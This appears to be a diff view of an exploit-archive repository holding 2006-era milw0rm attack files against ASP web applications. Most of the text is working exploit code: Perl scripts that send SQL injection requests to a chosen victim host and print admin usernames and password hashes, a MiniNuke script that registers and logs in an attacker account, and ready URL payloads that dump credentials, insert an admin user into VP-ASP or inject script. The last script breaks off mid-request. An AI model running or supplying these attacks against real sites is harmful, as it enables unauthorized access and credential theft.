#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages.. #googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
use IO::Socket; use IO::Socket;
if(@ARGV != 2) { usage(); } if(@ARGV != 2) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-22\r\n"; print "\n- NukedX Security Advisory Nr.2006-22\r\n";
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n"; print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path>\r\n"; print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n"; print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$ezserver = $ARGV[0]; $ezserver = $ARGV[0];
$ezserver =~ s/(http:\/\/)//eg; $ezserver =~ s/(http:\/\/)//eg;
$ezhost = "http://".$ezserver; $ezhost = "http://".$ezserver;
$ezdir = $ARGV[1]; $ezdir = $ARGV[1];
$ezport = "80"; $ezport = "80";
$eztar = "Default.asp?Scheme="; $eztar = "Default.asp?Scheme=";
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1"; $ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
$ezreq = $ezhost.$ezdir.$eztar.$ezxp; $ezreq = $ezhost.$ezdir.$eztar.$ezxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $ezserver\r\n"; print "- Trying to connect: $ezserver\r\n";
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n"; $ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
print $ez "GET $ezreq HTTP/1.1\n"; print $ez "GET $ezreq HTTP/1.1\n";
print $ez "Accept: */*\n"; print $ez "Accept: */*\n";
print $ez "Referer: $ezhost\n"; print $ez "Referer: $ezhost\n";
print $ez "Accept-Language: tr\n"; print $ez "Accept-Language: tr\n";
print $ez "User-Agent: NukeZilla\n"; print $ez "User-Agent: NukeZilla\n";
print $ez "Cache-Control: no-cache\n"; print $ez "Cache-Control: no-cache\n";
print $ez "Host: $ezserver\n"; print $ez "Host: $ezserver\n";
print $ez "Connection: close\n\n"; print $ez "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$ez>) { while ($answer = <$ez>) {
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) { if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
print "- Exploit succeed! Getting admin's information\r\n"; print "- Exploit succeed! Getting admin's information\r\n";
print "- USERNAME: $1\r\n"; print "- USERNAME: $1\r\n";
} }
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) { if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
print "- SHA1 HASH of PASSWORD: $1\r\n"; print "- SHA1 HASH of PASSWORD: $1\r\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "- This version of EzASPSite is vulnerable too\r\n"; print "- This version of EzASPSite is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n"; print "- So please edit query by manually adding null data..\r\n";
exit(); exit();
} }
} }
#Exploit failed... #Exploit failed...
print "- Exploit failed\n" print "- Exploit failed\n"
} }
# nukedx.com [2006-03-29] # nukedx.com [2006-03-29]
# milw0rm.com [2006-03-29] # milw0rm.com [2006-03-29]

154
platforms/asp/webapps/1700.pl
View file

@ -1,77 +1,77 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23 #Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid> #Usage: aspsi.pl <host> <path> <userid>
use IO::Socket; use IO::Socket;
if(@ARGV != 3) { usage(); } if(@ARGV != 3) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-23\r\n"; print "\n- NukedX Security Advisory Nr.2006-23\r\n";
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path>\r\n"; print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n"; print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n"; print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$asserver = $ARGV[0]; $asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg; $asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver; $ashost = "http://".$asserver;
$asdir = $ARGV[1]; $asdir = $ARGV[1];
$asport = "80"; $asport = "80";
$astar = "Haberler.asp?haber=devam&id="; $astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp; $asreq = $ashost.$asdir.$astar.$asxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $asserver\r\n"; print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n"; print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n"; print $as "Accept: */*\n";
print $as "Referer: $ashost\n"; print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n"; print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n"; print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n"; print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n"; print $as "Host: $asserver\n";
print $as "Connection: close\n\n"; print $as "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$as>) { while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) { if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) { if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
} }
else { die "- Exploit failed\n"; } else { die "- Exploit failed\n"; }
} }
if ($answer =~ /\" align=\"left\">(.*?)</) { if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n"; print "- Username: $1\r\n";
} }
if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) { if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n"; print "- MD5 HASH of PASSWORD: $1\r\n";
} }
if ($answer =~ /\| (.*?) ]<br>/) { if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n"; print "- Regdate: $1\r\n";
} }
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) { if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n"; print "- Email: $1\r\n";
} }
if ($answer =~ / Okunma : (.*?) /) { if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n"; print "- MD5 hash of answer: $1\r\n";
exit(); exit();
} }
} }
#Exploit failed... #Exploit failed...
print "- Exploit failed\n" print "- Exploit failed\n"
} }
#nukedx.com [2006-04-19] #nukedx.com [2006-04-19]
# milw0rm.com [2006-04-19] # milw0rm.com [2006-04-19]

36
platforms/asp/webapps/1714.txt
View file

@ -1,18 +1,18 @@
# BK Forum <= 4.0 Remote SQL Injection # BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy # by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org> # Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit: # Exploit:
First you must be logged in First you must be logged in
Then type this in your browser Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password You will find admin's password
# Shoutz: # Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00 nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun! # Have phun!
# milw0rm.com [2006-04-24] # milw0rm.com [2006-04-24]

60
platforms/asp/webapps/1759.txt
View file

@ -1,30 +1,30 @@
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com) VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp. well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified. * the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap. and close this text document asap.
* this information is for educational purposes only! * this information is for educational purposes only!
---- ----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query. The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a: quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')-- /shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all and for those of you that don't know sql at all
this is how you remove the user 'a': this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'-- /shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar -tracewar
# milw0rm.com [2006-05-06] # milw0rm.com [2006-05-06]

42
platforms/asp/webapps/1807.txt
View file

@ -1,21 +1,21 @@
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Vulnerability: Vulnerability:
-------------------- --------------------
SQL_Injection: SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text . Successful exploitation extracts username and password of administrator in clear text .
Proof of Concepts: Proof of Concepts:
-------------------- --------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
------- -------
By FarhadKey On 19 May 2006 By FarhadKey On 19 May 2006
# milw0rm.com [2006-05-19] # milw0rm.com [2006-05-19]

22
platforms/asp/webapps/1833.txt
View file

@ -1,11 +1,11 @@
# Title : qjForum(member.asp) SQL Injection Vulnerability # Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann # Author : ajann
# greetz : Nukedx,TheHacker # greetz : Nukedx,TheHacker
# Dork : "qjForum" # Dork : "qjForum"
# Exploit: # Exploit:
# Login before injection. # Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member ### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# milw0rm.com [2006-05-26] # milw0rm.com [2006-05-26]

98
platforms/asp/webapps/1834.asp
View file

@ -1,49 +1,49 @@
ENGLISH ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities # Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums" # Dork : "Copyright 2004 easy-content forums"
# Author : ajann # Author : ajann
# Exploit; # Exploit;
SQL INJECT.ON-------------------------------------------------------- SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT ### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x ### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example: Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS-------------------------------------------------------- XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT ### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example: Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities # Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory" # Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann # Aç... Bulan : ajann
# Aç.k bulunan dosyalar; # Aç.k bulunan dosyalar;
SQL INJECT.ON-------------------------------------------------------- SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ ### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken ### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
Örnek: Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS-------------------------------------------------------- XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ ### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek: Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r. http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
Ac.klama: Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir. userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir. userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
# milw0rm.com [2006-05-26] # milw0rm.com [2006-05-26]

14
platforms/asp/webapps/1836.txt
View file

@ -1,7 +1,7 @@
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability # Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Exploit Example: # Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
# milw0rm.com [2006-05-27] # milw0rm.com [2006-05-27]

408
platforms/asp/webapps/1837.pl
View file

@ -1,204 +1,204 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31 #Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail> #Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket; use IO::Socket;
if(@ARGV != 5) { usage(); } if(@ARGV != 5) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-31\r\n"; print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n"; print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n"; print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n"; print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n"; print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n"; print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n"; print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$mnserver = $ARGV[0]; $mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg; $mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver; $mnhost = "http://".$mnserver;
$mndir = $ARGV[1]; $mndir = $ARGV[1];
$mnuser = $ARGV[2]; $mnuser = $ARGV[2];
$mnpass = $ARGV[3]; $mnpass = $ARGV[3];
$mnmail = $ARGV[4]; $mnmail = $ARGV[4];
$mnport = "80"; $mnport = "80";
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $mnserver\r\n"; print "- Trying to connect: $mnserver\r\n";
getsession(); getsession();
} }
sub getsession () sub getsession ()
{ {
print "- Getting session for register...\r\n"; print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new"; $mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar; $mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n"; print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n"; print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n"; print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n"; print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n"; print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n"; print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n"; print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n"; print $mns "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$mns>) { while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; } if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
sub doregister () sub doregister ()
{ {
close($mns); close($mns);
$mntar = "membership.asp?action=register"; $mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar; $mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n"; print "- Session getting done\r\n";
print "- Lets create our user...\r\n"; print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser; $mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass; $mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail; $mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r"; $mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo"; $mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs"; $mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1"; $mndata.= "&icq=1";
$mndata.= "&msn=1"; $mndata.= "&msn=1";
$mndata.= "&aim=1"; $mndata.= "&aim=1";
$mndata.= "&sehir=1"; $mndata.= "&sehir=1";
$mndata.= "&meslek=1"; $mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b"; $mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1"; $mndata.= "&yas_1=1";
$mndata.= "&yas_2=1"; $mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920"; $mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com"; $mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r"; $mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif"; $mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn; $mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on"; $mndata.= "&mail_goster=on";
$mndatalen = length($mndata); $mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n"; print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n"; print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n"; print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n"; print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n"; print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n"; print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n"; print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n"; print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n"; print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n"; print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n"; print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n"; print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata; print $mn $mndata;
print $mn "\r\n\r\n"; print $mn "\r\n\r\n";
while ($answer = <$mn>) { while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) { if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n"; print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n"; print "- Loginning in to user...\r\n";
dologin(); dologin();
} }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
sub dologin () sub dologin ()
{ {
close ($mn); close ($mn);
$mnltar = "enter.asp"; $mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar; $mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser; $mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass; $mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412"; $mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412"; $mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata); $mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n"; print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n"; print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n"; print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n"; print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n"; print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n"; print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n"; print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n"; print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n"; print $mnl "Content-length: $mnldatalen\r\n";
